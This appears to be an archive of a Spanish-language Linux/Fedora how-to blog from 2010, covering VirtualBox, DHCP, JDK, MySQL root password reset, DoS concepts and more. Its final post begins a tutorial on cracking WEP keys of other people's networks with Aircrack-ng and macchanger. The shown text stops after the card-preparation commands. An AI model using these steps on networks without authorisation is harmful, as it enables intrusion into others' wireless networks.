martes, 23 de noviembre de 2010

Montar dispositivos USB en máquinas virtuales instaladas en VirtualBox sobre Fedora



Creo que a más de uno le ha pasado que luego de instalar VirtualBox no lo pueden ejecutar porque les da aparece un error: aqui pueden solucionar ese problema.

Una vez que ya han ejecutado VirtualBox sobre Fedora (no he comprobado esto en otras distribuciones) resulta que no pueden montar los dispositivos USB :(.

Ese es un gran problema ya que todos nuestros trabajos los movilizamos en nuestros Pen Drives, y si no lo podemos montar, al menos yo no podía trabajar con Software privativo, o me tocaba trabajar con samba para poder comunicar Windows y GNU/Linux.

En esta entrada les daré una solución rápida y eficaz para que monten sus dispositivos USB en las máquinas virtuales :).

Lo que se debe hacer es editar el archivo fstab para que el grupo vboxusers, que es el grupo que utiliza VirtualBox puede hacer a los USB.

Cabe mencionar que generalmente yo utilizo gedit para editor los archivos de texto. ustedes pueden usar cualquiera que acostumbren, ejemplo: (vi).
  • Abrimos el archivo fstab para editarlo:
# sudo gedit /etc/fstab

  • Añadir esta línea al final del archivo que acaban de abrir:
none /sys/bus/usb/drivers usbfs devgid=500,devmode=664 0 0

En devgid, debemos cambiar el 500 por el id de nuestro usuario, por defecto fedora asigna 500 al usuario que usamos por default.

Para saber el número de nuestro usuario hacemos esto:

  • Sistema - Administración - Usuarios y grupos



  • Y en la ventana que nos aparece podemos observar el número de usuario.


  • Por último debemos agregar a nuestro usuario al grupo vboxusers.
# usermod -G vboxusers -a "tu nombre de usuario"

O si prefieren lo pueden hacer gráficamente.





Saludos,

martes, 16 de noviembre de 2010

Aprendiendo a programar con Python

Otras de mis pasiones en la computación es la programación (pero desde el punto de vista de la resolución de problemas); hay un lenguaje en especial que ha llamado mucho mi atención hace un par de años, sin embargo hace unos seis meses empecé a dedicarle un poquito de tiempo, este lenguaje es Python.

Python fue creado por Guido Van Rossum a inicios de los años 90, el nombre fue tomado de los comediantes "Monty Python" que Guido veía en los esos años cuando estaba desarrollándolo.

Es un lenguaje de alto nivel interpretado, el cual puede ser integrado con otros lenguajes y herramientas.

Por su sencillez aumenta la productividad de los programadores y les permite a los desarrolladores generar código de más alta calidad y mantenible.

Entre las características más importantes que tiene Python están:

  • Simple
  • Sencillo de aprender
  • Lenguaje interpretado
  • Multiplataforma: (Unix, Linux, Mac, Window$, Palm, OS/S, ha sido portado a las máquinas virtuales de Java y .Net)
  • Tipado dinámico y conteo de referencias
  • Multiparadigma: (Orientación a objetos, programación imperativa, programación funcional).
  • Multipropósito: Se puede hacer cualquier clase de desarrollo (web, escritorio, scripting, etc).

"Es administrado por la Python Software Foundation. Posee una licencia de código abierto, denominada Python Software Foundation License, que es compatible con la Licencia pública general de GNU a partir de la versión 2.1.1, e incompatible en ciertas versiones anteriores."


Bibliografía:

  • http://es.wikipedia.org/wiki/Python
  • http://www.ecualug.org/files/Flisol%20-%20Python.pdf
  • http://www.python.org/
  • http://docs.python.org/tutorial/

Cambiar la imagen de fondo a la pantalla de Login en Fedora 14


No sé si les pasó a ustedes, pero una de las cosas que no me agradó en Fedora 14, es la imagen de fondo en la ventana de Login.

Aqui se las puse para que los que no usan fedora vean la imagen de fondo en cuestión.



Talvez a algunas personas les agrade la imagen, y no compartan mi punto de vista. Pero este post no lo escribí con la finalidad de discutir esto, sino más bien para cambiar ésta imágen por uno que sea de nuestro agrado, incluso puede ser una foto nuestra ;)..!!

Los pasos para cambiar la imagen son los siguientes:

  1. Seleccionar la imagen que deseamos poner como fondo de nuestra ventana de Login.
  2. Copiar la nuestra imagen seleccionada a la siguiente ruta: /usr/share/backgrounds/laughlin/default/standard/ Para copiar la imagen necesitamos usar cp como usuario root.
    • # cp nuestroArchivoImagen /usr/share/backgrounds/laughlin/default/standard/

  3. Nos movemos al directorio al cual acabamos de copiar la imagen.

    • # cd /usr/share/backgrounds/laughlin/default/standard/
  4. Ejecutamos # ls y verificamos que en el directorio hay dos archivos nuestroArchivoImagen y laughlin.png.
  5. Debemos renombrar los archivos:

    • # mv laughlin.png laughlin1.png1; mv nuestroArchivoImagen laughlin.png Con esto logramos que sea nuestra imagen la que se cargue en la venta de Logueo.
  6. Cerrar sesión para probar que nuestra imagen se ha cambiado ;)

Estoy tratando de cambiar toda la ventana de login, pero aún no lo he conseguido :(. En cuanto lo logre lo documentaré, pero si alguien ya lo ha hecho le agradecería mucho que me ayude con la información de cómo hacerlo.


Prefiere siempre Software Libre.


Saludos,


miércoles, 10 de noviembre de 2010

Firewall Open Source (SmoothWall)

Uno de los sistemas más importantes en la red de una organización es el firewall. En mi trabajo he tenido que realizar el manual de instalación de una opción que tenemos en Open Source,cuyo nombre es SmoothWall.



¿Qué es SmoothWall?

SmoothWall Express es un servidor de seguridad de código abierto basado en el sistema operativo GNU/Linux. Diseñado para un fácil uso, SmoothWall Express se configura a través de un GUI basado en web y no requiere ningún conocimiento de Linux para instalarlo o utilizarlo.

SmoothWall Express le permite construir fácilmente un servidor de seguridad para conectar de forma segura una red de ordenadores a Internet.





Casi cualquier PC pentium se puede utilizar, por ejemplo, un PC antiguo con bajas caracteristicas puede ser usado como estación de trabajo o servidor. SmoothWall Express crea un firewall de hardware dedicado, ofreciendo las facilidades y la seguridad real asociado con los dispositivos de hardware.

SmoothWall Express viene pre-configurado para detener todo el tráfico entrante que no es el resultado de una solicitud de salida. Los archivos de reglas que aplican esta política son parte de la configuración del sistema y normalmente no deberían ser editados por otros que no sean los procedimientos de configuración.

De esta dirección se pueden descargar el manual de instalación: http://www.slideshare.net/davo20019/instalacin-smoothwall-v09

En una próxima edición subiré un manual de configuración y administración de este Firewall.

Si tienen sugerencias o encuentra errores por favor hacermelo saber para mejorarlo.


Bibliografía:




martes, 12 de octubre de 2010

GStreamer: videobalance. Problema con Cámara

En este post escribiré la solución a un problema que tiene que ver con Gstreamer y el plugin videobalance. Quería iniciar Cheese para capturar imágenes por medio de la Cámara Web y no iniciaba ya que me presentaba un problema con el plugin de Gstreamer: videobalance (Aunque el problema se puede presentar con cualquier aplicación para capturar imágenes). Después de googlear, encontré la solución ;):

  • Eliminar el archivo /home/TUSUARIO/.gstreamer-0.10/registry.x86_64.bin
En realidad el x86_64 podría ser i386, dependiendo de la arquitectura de nuestro Sistema. Luego de eliminado ese archivo podemos ejecutar normalmente nuestra aplicación favorita para capturar imágenes desde la Cámara.


Saludos,


martes, 28 de septiembre de 2010

Canon MP-250 Series en GNU/Linux

Son escasas las empresas fabricantes de Hardware que desarrollan drivers para usar sus dispositivos en GNU/Linux; y hoy me he llevado una sorpresa con la Empresa Japonesa CANON. Resulta que algunos de sus dispositivos pueden ser usados en GNU/Linux; es cuestión de buscar unos pocos minutos los drivers y de seguro lo encontraran en la WEB.

Les voy a redactar lo fácil que es instalar un dispositivo fabricado por CANON en GNU/Linux. No se necesita casi nada de conocimientos técnicos, el unico requisito es que sepan qué distribución tienen instalada en su maquina ya que de esta manera podremos seleccionar entre estos dos tipos de archivos: .deb (Ubuntu, Debian, etc)o .rpm (Fedora, Red hat, CentOS, etc).

Descarga de los paquetes necesarios:
  • Desde Aqui podemos descargar los paquetes .deb. Al final de la página está la opción "Download".
  • Desde Aqui para descargar los paquetes .rpm. Al final de la página está la opción "Download"
Una vez descargado el archivo, descomprimimos el archivo dentro del cual estan los archivos con las extensiones mencionadas arriba. Ejecutamos los archivos que correspondan a nuestra arquitectura de Sistema Operativo (i386) para 32 Bits y (x86_64) para 64 Bits.

Una vez que hayamos ejecutado los dos archivos, conectamos la impresora e imprimimos nuestra página de prueba.

Cabe mencionar que también se instala el controlador para el escaner.


Saludos,

NOTA: Comentar es una de las mejores formas de agradecer la utilidad de la información.

jueves, 9 de septiembre de 2010

Problema de Conectividad de Red en "Mainboard Intel DG41TY"

He visto que varias personas alrededor del mundo han visitado mi Blog, me resultó gratificante saber que al menos a una persona le he ayudado a solucionar algún problema. Pero les agradecería mucho si dejan sus comentarios, esa es una buena forma de incentivar a continuar publicando información útil.

En esta ocasión tuve un problema de Hardware; una de las actividades en mi trabajo es la de administrar un Laboratorio con 18 computadores a los cuales les instalé 3 Sistemas Operativos (Window$ XP y Server y CentOS 5.5) , todos estos equipos son totalmente nuevos.

Resulta que a la Semana de poner en operación los computadores, algunos empezaron a mostrar problemas con la Red. En primera instancia creí que era algún problema con los servidores de DHCP y/o DNS, dispositivos de interconexión, cableado, entre otros; pero todos ellos funcionaban a la perfección así que descarté esas opciones de fallos.

Como los discos fueron clonados, dio la pauta para creer que era un problema de Drivers sin embargo el Sistema Operativo CentOS fue instalado desde cero en cada una de las máquinas así que esa hipótesis también fue descartada.

Se procedió a llamar a la empresa que vendió los equipos, y resulta que la solución al problema que nos dieron, fue la siguientee:

  • Actualizar el BIOS. Link de descarga
  • Este punto me parecía innecesario, pero es el que resolvía el problema. DEBEN SACAR LA PILA AL MENOS 5 MINUTOS, y LUEGO COLOCARLA NUEVAMENTE.
  • Si los pasos anteriores no funcionan, compren una pila nueva (jejeje, suena chistoso pero así me lo dijeron). Según Intel esta es la solución definitiva, a mi me resultó con la última opción hasta el momento.

Pero la mejor Opción es comprar un Mainboard que no sea esta. Asi se van ahorrar muchos problemas.


Saludos,



lunes, 31 de mayo de 2010

Solución problema VirtualBox en fedora 13

He tratado de instalar VirtualBox 3.2 sobre Fedora 13 y resulta que la instalación se desarrolla adecuadamente pero al momento que quiero ejecutarlo me sale un error:

Posteriormente sale esta pantalla:



Trato de hacer lo que me sugiere el mensaje pero no se soluciona el mensaje; googleando un poco encontré la solución al problema que espero sea de ayuda para alguien más.

SOLUCIÓN

  • Instalamos los paquetes requeridos.
# yum -y install kernel-devel kernel-headers

  • Necesitamos tener instalado un compilador de C. Puede ser GCC.
# yum -y install gcc

  • Luego de eso seguimos las instrucciones del mensaje del error.

# /etc/init.d/vboxdrv setup



Debe salirnos todo o.k. para verificar que ha salido todo bien. Esto es todo ya pueden usar su virtualBox.


REFERENCIAS:

martes, 18 de mayo de 2010

Servidor DHCP sobre GNU/Linux Fedora

He visto varias deficiencias en algunos compañeros de clase respecto a redes (y algunos egresados), así que voy a hacer un compendio de configuración de los servidores más básicos sobre Linux.

En esta primera entrega vamos a empezar con el servidor DHCP.

Dynamic Host Configuration Protocol
(Protocolo de Configuración Dinámica de Host)




"El DHCP es una alternativa a otros protocolos de gestión de direcciones IP de red, como el BOOTP (Bootstrap Protocol). DHCP es un protocolo más avanzado, pero ambos son los usados normalmente."

Es un protocolo que permite a dispositivos individuales en una red de direcciones IP obtener su propia información de configuración de red (dirección IP; máscara de sub-red, puerta de enlace, etc.) a partir de un servidor DHCP. DHCP existe desde 1993 como protocolo estándar y se describe a detalle en el RFC 2131.

Sin la ayuda de un servidor DHCP, tendrían que configurarse de forma manual cada dirección IP de cada host que pertenezca a una Red de Área Local. Si un host se traslada hacia otra ubicación donde existe otra Red de Área Local, se tendrá que configurar otra dirección IP diferente para poder unirse a esta nueva Red de Área Local. Un servidor DHCP entonces supervisa y distribuye las direcciones IP de una Red de Área Local asignando una dirección IP a cada anfitrión que se una a la Red de Área Local.

Existen tres métodos de asignación en el protocolo DHCP:

  • Asignación manual: La asignación utiliza una tabla con direcciones MAC (acrónimo de Media Access Control Address, que se traduce como dirección de Control de Acceso al Medio). Sólo los anfitriones con una dirección MAC definida en dicha tabla recibirá el IP asignada en la misma tabla. Ésto se hace a través de los parámetros hardware ethernet y fixed-address.
  • Asignación automática: Una dirección de IP disponible dentro de un rango determinado se asigna permanentemente al anfitrión que la requiera.
  • Asignación dinámica: Se determina arbitrariamente un rango de direcciones IP y cada host conectado a la red está configurada para solicitar su dirección IP al servidor cuando se inicia el dispositivo de red, utilizando un intervalo de tiempo controlable (parámetros default-lease-time y max-lease-time) de modo que las direcciones IP no son permanentes y se reutilizan de forma dinámica.

Luego de algunos conceptos básicos importantes para entender qué es lo que estamos haciendo, ya que lo importante no es "subir" un servidor sino entender su funcionamiento, y de acuerdo a eso ver sí es necesario tenerlo o no.

INSTALACIÓN

Como nuestra configuración lo vamos a hacer sobre un sistema fedora, usaremos el comando "yum" para instalar paquetes, si ustedes usan algún sistema basado en Debian (Como Ubuntu) deben usar "apt-get", para Red Hat Enterprise "up2date".

  • # yum -y install dhcp
Aqui estamos instalando el paquete dhcp.

Parámetros configurables


Como casi todos los servidores en Linux, el servidor DHCP tiene un archivo de configuración /etc/dhcp/dhcpd.conf.

Un servidor DHCP puede proveer de una configuración opcional a la computadora cliente. Dichas opciones están definidas en RFC 2131.

Lista de opciones configurables:

* Dirección del servidor DNS
* Nombre DNS
* Puerta de enlace de la dirección IP
* Dirección de Publicación Masiva (broadcast address)
* Máscara de subred
* Tiempo máximo de espera del ARP
* MTU (Unidad de Transferencia Máxima)
* Servidores NIS (Servicio de Información de Red)
* Dominios NIS
* Servidores NTP (Protocolo de Tiempo de Red)
* Servidor SMTP
* Servidor TFTP
* Nombre del servidor WINS


  • # gedit /etc/dhcp/dhcpd.conf

authoritative;
ddns-updates on;
ddns-update-style ad-hoc;
option domain-name-servers 10.0.0.1, 202.188.0.133, 202.188.1.5;
option subnet-mask 255.255.255.0;
option routers 10.0.0.1;

subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.201 192.168.1.220;
default-lease-time 86400;
max-lease-time 86400;
option routers 192.168.1.1;
option ip-forwarding off;
option broadcast-address 192.168.1.255;
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.1.100;
option nntp-server 192.168.1.100;
option netbios-name-servers 192.168.1.100;
}

subnet 10.0.0.0 netmask 255.255.255.0 {
ddns-updates on;
range 10.0.0.60 10.0.0.150;
}

group {
host 001_1 {
ddns-updates on;
hardware ethernet 00:50:8b:aa:f3:24;
fixed-address 10.0.0.50;
}

host 001_2 {
ddns-updates on;
hardware ethernet 00:50:8b:aa:f3:24;
fixed-address 10.0.0.50;
}

host cosh {
hardware ethernet 00:30:6e:28:5c:3f;
fixed-address 10.0.0.9;
}
}


ddns-domainname - Mediante el uso de este parámetro, se añadirá al final del nombre de la máquina cliente, para formar un nombre de dominio totalmente cualificado (FQDN).

ddns-update-style - Define el método de actualización automática de las DNS. Los valores pueden ser ad-hoc, interim y none.

ddns-updates - Activa la actualización DNS mediante los valores asignados por DHCP.

default-lease-time - Especifica la cantidad de tiempo, en segundos, que será mantenida una asignación de direcciones, siempre y cuando el cliente no haya especificado algo concreto.

fixed-address - Esta opción aparece únicamente en una declaración de host. Define las direcciones estática a asignar a un host determinado.

group - Inicia la declaración de Grupo.

hardware - Especifica el hardware de un cliente BOOTP para que éste sea reconocido por el servidor de DHCP. Tipo puede ser ethernet o token-ring y dirección será una serie de octetos hexadecimales inequívocos de la tarjeta (por ejemplo, hardware ethernet 00:50:b3:c5:60:23).

max-lease-time - Especifica la cantidad máxima de tiempo, en segundos, que será mantenida una asignación de direcciones. No está sujeta a esta especificación la asignación dinámica BOOTP.

min-lease-time - Especifica la cantidad mínima de tiempo, en segundos, que será mantenida una asignación de direcciones.

one-lease-per-client - Cuando la opción se iguala a on y un cliente solicita una asignación de dirección (DHCPREQUEST), el servidor libera de forma automática cualquier otra asignación asociada a dicho cliente. Con esto se supone que si el cliente solicita una nueva asignación es porque ha olvidado que tuviera alguna, luego tiene un sólo interfaz de red. No dándose esta situación entre los clientes no es muy aconsejable el uso de esta opción.

range ip-menor ip-mayor - En una declaración de subred, este parámetro define el rango de direcciones que serán asignadas. Pueden darse dos instrucciones range seguidas del modo:

range 192.168.0.11 192.168.0.100;
range 192.168.0.125 192.168.0.210;

server-identifier - Identifica la máquina donde se aloja el servidor de DHCP. Su uso se aplica cuando la máquina en cuestión tiene varias direcciones asignadas en un mismo interfaz de red.

server-name - Nombre del servidor que será suministrado al cliente que solicita la asignación.

shared-network - Declaración de Subred compartida.
subnet - Declaración de Subred.

option domain-name - Nombre de dominio que usará el cliente en una resolución de nombres vía DNS. Normalmente, será el nombre de dominio que se añadirá al host que realiza la petición de asignación.

option domain-name-servers - Define el nombre de los servidores DNS.

option finger-server - Define el nombre de los servidores Finger disponibles para el cliente.

option host-name - Especifica el nombre del cliente. Puede ser un nombre cualificado o no, aunque se recomienda que el nombre del dominio se asigne mediante option domain-name. Sólo se asignará el nombre al cliente en el caso de no tener éste asignado ninguno.

option irc-server - Define el nombre de los servidores de IRC disponibles para el cliente.

option lpr-servers - Define una lista de servidores de impresión LPR conforme al estándar RFC 1179. Se listan por orden de preferencia.

option nds-servers - Define una lista de servidores NDS disponibles para el cliente. Se usa en conjunción de option nds-context , que establece el nombre de inicio de la red Netware y option-nds-tree-name , que especifica el nombre del árbol a usar por el cliente solicitante.

option netbios-name-servers - Especifica un listado con los servidores WINS disponibles para los clientes.

option nis-servers - Define la lista de servidores NIS (Sun Network Information Server) disponibles. Los servidores se listan en orden de preferencia. Para establecer el nombre del dominio NIS, se usará option nis-domain .

option ntp-server - Define los servidores horarios de NTP disponibles. Se listan en oreden de preferencia.

option pop-server - Define los servidores de POP3 disponibles, listados en orden de preferencia.

option routers - Se definen una serie de routers (en la práctica, puertas de enlace), listadas en orden de preferencia, disponibles para el acceso al exterior por parte del cliente.

option smtp-server - Define la lista de servidores SMTP disponibles, listados en orden de preferencia.

option subnet-mask - Definición de la máscara de subred general.



Para indicarle la tarjeta de red que queremos usar con el servidor DHCP:
  • # gedit /etc/sysconfig/dhcpd

Y ponemos el nombre de la tarjeta a usar, al parametro:

DHCPDARGS el valor wlan0, wlan1, eth0, eth1, eth2, ... según corresponda al de nuestra tarjeta.



Ahora, hacemos que el servicio se levante automáticamente:
  • # chkconfig dhcpd on

Reiniciamos el servicio:

  • # service dhcpd restart


Con eso ya tenemos nuestro servidor DHCP, listo para ser usado.



Saludos,


NOTA: Los parámetros deben ser modificados de acuerdo a sus necesidades, los que están en el ejemplo sólo son ilustrativos.





jueves, 6 de mayo de 2010

Instalación JDK en GNU/Linux

Muchas de las veces queremos empezar a desarrollar nuestras propias aplicaciones en java pero para ello necesitamos tener instalado el JDK.

Java Development Kit (o simplemente, JDK) es un software que nos provee de excepcionales herramientas de desarrollo para programar y crear aplicaciones y programas en Java.

JDK es multiplataforma, y puede instalarse en entornos Linux, Windows, Solaris y Mac OS. JDK es un complemento necesario para IDE’s como NetBeans, Eclipse, etc.

Proceso de instalación:
  • Necesitamos descargar el archivo JDK/SDK, lo podemos hacer desde aqui.
Comprobar que el tamaño del archivo descargado coincida con el tamaño del archivo que está en el servidor, para comprobar que no hayan ocurrido errores en la descarga


  • Es recomendable realizar la instalación en el directorio /usr/local, asi que el archivo del JDK descargado anteriormente lo vamos a copiar en esa ruta.
# cp jdk-6u20-linux-x64.bin /usr/local

  • Nos situamos en la ruta /usr/local para proceder a cambiarle los permisos al archivo y poder ejecutarlo.
# chmod a+x jdk-6u20-linux-x64.bin

  • Ejecutamos el instalador, # ./jdk-6u20-linux-x64.bin, aceptamos el contrato de licencia. La instalación crea una carpeta donde ha almacenado todos los archivos, es recomendable cambiarla simplemente a java.
  • Una vez que ha terminado la instalación procedemos a exportar las variables de entorno.

# JAVA_HOME="/usr/local/java"
# PATH="$PATH:/usr/local/java/bin"
# CLASSPATH="/usr/local/java/lib"
# export JAVA_HOME PATH CLASSPATH

  • Luego de realizar los pasos anteriores, verificamos que la instalación se haya llevado a cabo correctamente.
# java -version

Si el comando nos devueleve la versión del java instalado, significa que todo esta correcto, y podemos instalar cualquer IDE para hacer nuestros desarrollos.


Saludos,


jueves, 29 de abril de 2010

Cambiar la contraseña de root de MySql

Si han hecho la instalación de MySql sobre GNU/Linux y no pusieron la contraseña, o lo que es peor la olvidaron; les voy a dar unos pocos pasos para que puedan re-establecer la contraseña de root en MySql.

  • Detener el servicio de MySql
opción 1: # service mysqld stop
opción 2: # /etc/init.d/mysqld stop

  • Iniciar en modo FULL o abierto.
# mysqld_safe --skip-grant-tables --skip-networking&

--skip-grant-tables esta opción causa que el servidor no use el sistema de privilegios lo que le da acceso ilimitado a todas las bases de datos a todos los usuarios de la base de datos.

--skip-networking deja de escuchar (LISTEN) conexiones TCP/IP provenientes de la red, es decir MySQL trabajaría en un ambiente totalmente local.

  • Iniciar el modo monitor.
# mysql -u root

  • Usamos la base del sistema mysql.
mysql > use mysql;


  • Actualizamos el campo que cambiará la contraseña.
mysql> update user set password =password('nueva_clave') where user='root';

  • Salimos de mysql.
mysql> exit;

  • Reiniciamos el servidor, y listo.

# service mysqld restart


Espero haya sido de utilidad, o si saben de alguna otra manera para cambiar la clave de root postéelan.

Saludos,

miércoles, 21 de abril de 2010

DoS y DDoS

DOS (Denial of Service) y DDoS(Distributed Denial of Service)


Una técnica de ataque que consiste en hacer inaccesible el o los recursos de un sistema de computación a los clientes de este.

Generalmente este tipo de ataques se lo llevan a cabo saturando el ancho de red o haciendo un número grande de solicitudes del servicio.

Un ataque DoS puede ser perpetrado en un numero de formas. Aunque básicamente consisten en :
  • Consumo de recursos computacionales, tales como ancho de banda, espacio de disco, o tiempo de procesador.
  • Alteración de informacion de configuración, tales como información de rutas de encaminamiento.
  • Alteración de información de estado, tales como interrupción de sessiones TCP (TCP reset).
  • Interrupción de componentes físicos de red.
  • Obstrucción de medios de comunicación entre usuarios de un servicio y la victima, de manera que ya no puedan comunicarse adecuadamente.

La diferencia de DDoS (Distributed Denial of Service) con DoS, es que en el primero el atacante se hace con el control de otros computadorespara poder llevar a cabo su tarea.

Los administradores de red deben tomar medidas de prevención y detección de estas amenazas. Ya que un ataque de estos pueden ser sutil o muy catastrófico para una organización.

Entre las recomendaciones que se deben tomar están las siguientes:

  • Tener un servidor de Logs
  • HoneySpots
  • Firewalls
  • Sniffers
  • entre otros.





martes, 30 de marzo de 2010

Integrar Amarok con Gnome

Instalé Amarok en mi fedora 12 con Gnome, pues como ya es sabido Amarok es desarrollado para ser usado nativamente con el entorno de escritorio KDE. Asi que para poder usarlo con Gnome es necesario instalar los siguientes paquetes:

xine xine-lib-extras xine-lib-extras-freeworld

Para los que no sepan como instalar paquetes en fedora o en cualquier distribución basada en Red Hat, a continuación el detalle:

  • Abrir una consola como root: su
  • Teclear yum -y install xine xine-lib-extras xine-lib-extras-freeworld

Y listo, su Amarok ya puede ser usado con el entorno de escritorio Gnome.



Saludos,

Shockwave flash player en fedora 15 x86_64

Resulta que instalé Fedora 12, la versión de 64 bits en mi portátil, y no lograba instalar el flash player; luego de 1 hora en internet encontré la solución la cual quiero compartir, talvez a alguien más le sirve.

Primero debemos desargar el plugin desde la página oficial de adobe:

http://download.macromedia.com/pub/labs/flashplatformruntimes/flashplayer11/flashplayer11_b1_install_lin_64_071311.tar.gz

Una vez que descargamos este paquete, para descomprimirlo nos ubicamos desde la consola en el directorio en el cual descargamos el archivo, usando:
"tar -xzvf libflashplayer-10.0.32.18.linux-x86_64.so.tar.gz"



Una vez que se ha extraído el archivo, lo debemos copiar al directorio donde firefox almacena los plugins; generalmente este directorio está en la ruta /home/"usuario"/.mozilla/plugins/.

Para mi caso particular lo copié de esta manera:
"cp /home/david/Escritorio/libflashplayer.so /home/david/.mozilla/plugins/"

NOTA: En este caso mi usuario es "david", ustedes lo deben reemplazar por su usuario.

Hecho esto, reinician firefox, y ya pueden acceder a páginas como youtube o a sus juegos online. Si después de reiniciar sigue sin funcionar, reinicien su computadora.

Para verificar que este instalado el plugin: abrimos firefox, nos vamos a herramientas, complementos, plugins, y debe aparecel el plugin "Shockwave Flash", como se observa en la imagen.




Saludos,

jueves, 25 de marzo de 2010

E-SOA

Las empresas necesitan poder interconectar los procesos, personas e información tanto con la propia organización como con subsidiarias y socios comerciales. La falta de integración entre los componentes de IT –sistemas, aplicaciones y datos- hace difícil obtener una respuesta rápida y efectiva ante los cambios que afectan de forma natural a los negocios. La inflexibilidad genera costes, reduce la capacidad de respuesta ante los clientes, compromete el cumplimiento con las normativas legales y afecta negativamente a la productividad de los empleados.
En suma, una deficiente integración es uno de los problemas más importantes a los que las organizaciones deben hacer frente para mantener su competitividad y garantizar su crecimiento.
La Arquitectura Orientada a Servicios (SOA, Service Oriented Architecture) supone una estrategia general de organización de los elementos de IT, de forma que una colección abigarrada de sistemas distribuidos y aplicaciones complejas se pueda transformar en una red de recursos integrados, simplificada y sumamente flexible. Un proyecto SOA bien ejecutado permite alinear los recursos de IT de forma más directa con los objetivos de negocio, ganando así un mayor grado de integración con clientes y proveedores, proporcionando una inteligencia de negocio más precisa y más accesible con la cual se podrán adoptar mejores decisiones, y ayuda a las empresas a optimizar sus procesos internos y sus flujos de información para mejorar la productividad individual. El resultado neto es un aumento muy notable de la agilidad de la organización.


El contexto empresarial

Cada vez más las organizaciones dependen de su infraestructura de IT para alcanzar sus objetivos.
Pero en un entorno competitivo como el actual, aprovechar las oportunidades de negocio exige moverse con rapidez. Sin embargo, con frecuencia las Tecnologías de Información no permiten estas respuestas rápidas ni disponen de la flexibilidad necesaria para competir de forma efectiva. Un alto porcentaje de las ineficiencias organizativas tienen un mismo origen: el predominio de procesos manuales con un nivel de error elevado, sistemas ineficaces para compartir la información en el seno
de la organización; la incapacidad de hacer un correcto seguimiento de los procesos de negocio desde principio a fin; el cumplimiento con las normativas legales aplicables obliga a manejar grandes cantidades de información y en formatos complicados de utilizar; y finalmente, las ineficiencias propias del servicio a clientes. Allí donde se produce cualquiera de estas situaciones, el impacto sobre la
productividad de los empleados es negativo, y se pone en riesgo la capacidad de crecimiento y competencia de la propia empresa.

¿Qué es SOA?

La Arquitectura SOA establece un marco de diseño para la integración de aplicaciones independientes de manera que desde la red pueda accederse a sus funcionalidades, las cuales se ofrecen como servicios. La forma más habitual de implementarla es mediante Servicios Web, una tecnología basada en estándares e independiente de la plataforma, con la que SOA puede descomponer aplicaciones
monolíticas en un conjunto de servicios e implementar esta funcionalidad en forma modular.

CONCLUSIÓN

SOA es una alternativa al momento de cubrir requerimientos empresariales, podemos utilizar aplicaciones ya desarrolladas que satisfagan ciertas necesidades de la empresa para luego integrar estos componentes, y satisfacer en totalidad los requerimientos de la empresa.

SOA a los expertos en software les habré un nuevo nicho de mercado, que no es necesariamente desarrollar componentes, sino más bien integrarlos.



Saludos,


David Loor M.

domingo, 14 de marzo de 2010

Tipos y Tecnologías de Redes


TIPOS DE REDES

Según la cobertura tenemos:
  • LAN (Local Area Network): Redes locales
  • MAN (Metropolitan Area Network): Redes metropolitanas
  • WAN (Wide Area Network): Unión de varias redes LAN dispersas geográficamente entre sí.
  • CAN (Campus Area Network): Unión de varias redes LAN dispersas en un campus.
  • PAN (Personal Administration Network): Redes pequeñas de no más de 8 equipos.
  • Interredes: Colección de redes conectadas.

Según la topología tenemos:


  • Anillo: Todos los dispositivos están conectados al otro en un bucle cerrado.
  • Estrella: Todos los dispositivos estan conectados a un dispositivo de interconexión.
  • Malla: Los dispositivos están conectado en muchas interconexiones redundantes entre nodos de la red.
  • Árbol: Topología mixta.

TECNOLOGÍAS DE REDES

  • FDDI (Fiber Distributed Interface): Proporciona un backbone de alta velocidad a las redes LAN o WAN existentes.
  • ATM (Asynchronous Transfer Mode): Es una red de conmutación de paquetes que envía paquetes de longitud fija a través de LANs o WANs, en lugar de paquetes de longitud variable utilizados en otras tecnologías.
  • SMDS (Switched Multi-megabit Data Service): Proporciona conectividad para MAN’s, subredes FDDI, y redes LAN privadas, de modo que compartir los datos sea tan fácil como realizar una llamada telefónica, y soportando tanto datos como voz y vídeo.

PROTOCOLO TCP/IP


El protocolo TCP/IP (Transfer Control Protocol/Internet Protocol) es el protocolo utilizado para gestionar el tráfico de datos en la red. Este protocolo en realidad está formado por dos protocolos diferentes y que realizan acciones diferentes.
Por un lado está el protocolo TCP, que es el encargado del control de transferencia de datos y por otro está el protocolo IP, que es el encargado de la identificación de la máquina en la red.

jueves, 18 de febrero de 2010

Obtener claves WEP con ayuda de Aircrack-ng

Aircrack-ng es una suite de programas para la auditoría de redes inalámbricas.


Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles de descifrar y por error para el usuario de una conexión la más común.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.


¿Qué necesito para usar Aircrack-ng?.

Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red atacada para poder descifrar la clave.

Los programas en cuestión que trae Aircrack-ng así como macchanger.


¿Qué es recomendado tener para usar Aircrack-ng?


Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB, ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax, WifiWay

¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB?


Aircrack-ng Downloads

En Ubuntu:

sudo apt-get install aircrack-ng

Para instalar Macchanger, puedes pasarte por su web

Macchanger Downloads

En Ubuntu:

sudo apt-get install macchanger

Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con clientes asociados.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.

Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando varía según la distribución GNU/Linux que usemos.

sudo su

*** Preparación de la tarjeta

airmon-ng

>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500.

airmon-ng stop ra0

>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.

ifconfig ra0 down

